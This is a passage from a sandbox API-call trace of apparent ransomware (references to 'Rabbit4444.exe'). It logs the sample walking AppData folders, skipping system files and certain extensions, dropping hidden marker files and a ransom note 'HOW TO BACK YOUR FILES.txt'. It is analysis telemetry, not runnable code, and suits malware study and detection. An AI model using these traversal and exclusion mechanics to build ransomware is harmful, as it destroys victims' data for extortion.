[0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2="boot") returned 1 [0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2="ids.txt") returned 1 [0054.557] lstrcmpiW (lpString1="TileDataLayer", lpString2="NTUSER.DAT") returned 1 [0054.557] lstrcpyW (in: lpString1=0x130eb74, lpString2="TileDataLayer" | out: lpString1="TileDataLayer") returned="TileDataLayer" [0054.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0054.557] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x58) returned 0x1157a8 [0054.557] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xf6510 [0054.557] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UNP", cAlternateFileName="")) returned 1 [0054.557] lstrcmpiW (lpString1="UNP", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.557] lstrcmpiW (lpString1="UNP", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.557] lstrcmpiW (lpString1="UNP", lpString2="Rabbit4444.exe") returned 1 [0054.557] lstrcmpiW (lpString1="UNP", lpString2=".") returned 1 [0054.558] lstrcmpiW (lpString1="UNP", lpString2="..") returned 1 [0054.558] lstrcmpiW (lpString1="UNP", lpString2="windows") returned -1 [0054.558] lstrcmpiW (lpString1="UNP", lpString2="bootmgr") returned 1 [0054.558] lstrcmpiW (lpString1="UNP", lpString2="pagefile.sys") returned 1 [0054.558] lstrcmpiW (lpString1="UNP", lpString2="boot") returned 1 [0054.558] lstrcmpiW (lpString1="UNP", lpString2="ids.txt") returned 1 [0054.558] lstrcmpiW (lpString1="UNP", lpString2="NTUSER.DAT") returned 1 [0054.558] lstrcpyW (in: lpString1=0x130eb74, lpString2="UNP" | out: lpString1="UNP") returned="UNP" [0054.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6568 [0054.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x44) returned 0x10b790 [0054.558] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6570 | out: ListHead=0xf68b0, ListEntry=0xf6570) returned 0xf6530 [0054.558] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2="Rabbit4444.exe") returned 1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2=".") returned 1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2="..") returned 1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2="windows") returned -1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2="bootmgr") returned 1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2="pagefile.sys") returned 1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2="boot") returned 1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2="ids.txt") returned 1 [0054.558] lstrcmpiW (lpString1="VirtualStore", lpString2="NTUSER.DAT") returned 1 [0054.558] lstrcpyW (in: lpString1=0x130eb74, lpString2="VirtualStore" | out: lpString1="VirtualStore") returned="VirtualStore" [0054.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0054.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x56) returned 0x115628 [0054.558] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf6570 [0054.558] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0054.558] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0054.558] lstrcpyW (in: lpString1=0x130eb74, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.559] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.559] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.560] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.560] CloseHandle (hObject=0x278) returned 1 [0054.560] CloseHandle (hObject=0x27c) returned 1 [0054.560] GetCurrentThreadId () returned 0xd98 [0054.560] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0054.560] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore") returned="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore" [0054.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115628 | out: hHeap=0xe0000) returned 1 [0054.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0054.560] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore") returned="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore" [0054.560] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore\\" [0054.560] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore\\.BFC0E91B00AE8A0620D3" [0054.560] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\virtualstore\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.561] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.564] FlushFileBuffers (hFile=0x27c) returned 1 [0054.564] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.564] CloseHandle (hObject=0x27c) returned 1 [0054.565] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore") returned 42 [0054.565] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.565] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe9d714ca, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0054.565] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.565] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.565] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.565] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.565] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe9d714ca, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.565] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.565] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.565] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.565] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.566] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.566] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9d714ca, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9d714ca, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9d96214, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.566] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.566] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.566] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9d714ca, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9d714ca, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9d96214, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.566] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0054.566] lstrcpyW (in: lpString1=0x130eb8e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.566] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\virtualstore\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.566] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.566] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.567] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.567] CloseHandle (hObject=0x278) returned 1 [0054.567] CloseHandle (hObject=0x27c) returned 1 [0054.567] GetCurrentThreadId () returned 0xd98 [0054.567] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6570 [0054.567] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\UNP") returned="C:\\Users\\FD1HVy\\AppData\\Local\\UNP" [0054.567] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b790 | out: hHeap=0xe0000) returned 1 [0054.567] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6568 | out: hHeap=0xe0000) returned 1 [0054.567] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\UNP" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\UNP") returned="C:\\Users\\FD1HVy\\AppData\\Local\\UNP" [0054.567] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\" [0054.567] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\.BFC0E91B00AE8A0620D3" [0054.567] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\unp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.569] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.573] FlushFileBuffers (hFile=0x27c) returned 1 [0054.574] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.574] CloseHandle (hObject=0x27c) returned 1 [0054.575] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\UNP") returned 33 [0054.575] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.575] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe9d96214, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0054.575] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.575] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.575] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.575] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.575] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe9d96214, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.575] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.575] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.575] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.575] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.575] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.575] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9d96214, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9d96214, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9d96214, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.575] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.575] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.575] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xf56c97e4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", cAlternateFileName="{91BE5~1")) returned 1 [0054.575] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.575] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.575] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2="Rabbit4444.exe") returned -1 [0054.575] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2=".") returned 1 [0054.575] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2="..") returned 1 [0054.575] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2="windows") returned -1 [0054.576] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2="bootmgr") returned -1 [0054.576] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2="pagefile.sys") returned -1 [0054.576] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2="boot") returned -1 [0054.576] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2="ids.txt") returned -1 [0054.576] lstrcmpiW (lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", lpString2="NTUSER.DAT") returned -1 [0054.576] lstrcpyW (in: lpString1=0x130eb7c, lpString2=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock" | out: lpString1=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock") returned=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock" [0054.576] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\.{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", dwFileAttributes=0x2) returned 1 [0054.578] lstrlenW (lpString=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock") returned 46 [0054.578] lstrlenW (lpString="Rabbit4444") returned 10 [0054.578] lstrcmpiW (lpString1="7a}_uxlock", lpString2="Rabbit4444") returned -1 [0054.578] lstrlenW (lpString=".dll") returned 4 [0054.578] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0054.578] lstrlenW (lpString=".lnk") returned 4 [0054.578] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0054.578] lstrlenW (lpString=".ini") returned 4 [0054.578] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0054.578] lstrlenW (lpString=".sys") returned 4 [0054.578] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0054.578] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xf56c97e4, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".{91be532c-f9f1-406a-9858-43697c6f437a}_uxlock", cAlternateFileName="{91BE5~1")) returned 0 [0054.578] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0054.578] lstrcpyW (in: lpString1=0x130eb7c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.578] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\UNP\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\unp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.580] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.580] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.580] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.580] CloseHandle (hObject=0x278) returned 1 [0054.580] CloseHandle (hObject=0x27c) returned 1 [0054.580] GetCurrentThreadId () returned 0xd98 [0054.580] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6530 [0054.580] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer" [0054.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1157a8 | out: hHeap=0xe0000) returned 1 [0054.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0054.580] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer" [0054.580] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\" [0054.580] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\.BFC0E91B00AE8A0620D3" [0054.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.582] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.584] FlushFileBuffers (hFile=0x27c) returned 1 [0054.585] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.585] CloseHandle (hObject=0x27c) returned 1 [0054.586] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer") returned 43 [0054.586] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.586] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe9dbc444, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0054.586] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.586] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.586] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.586] 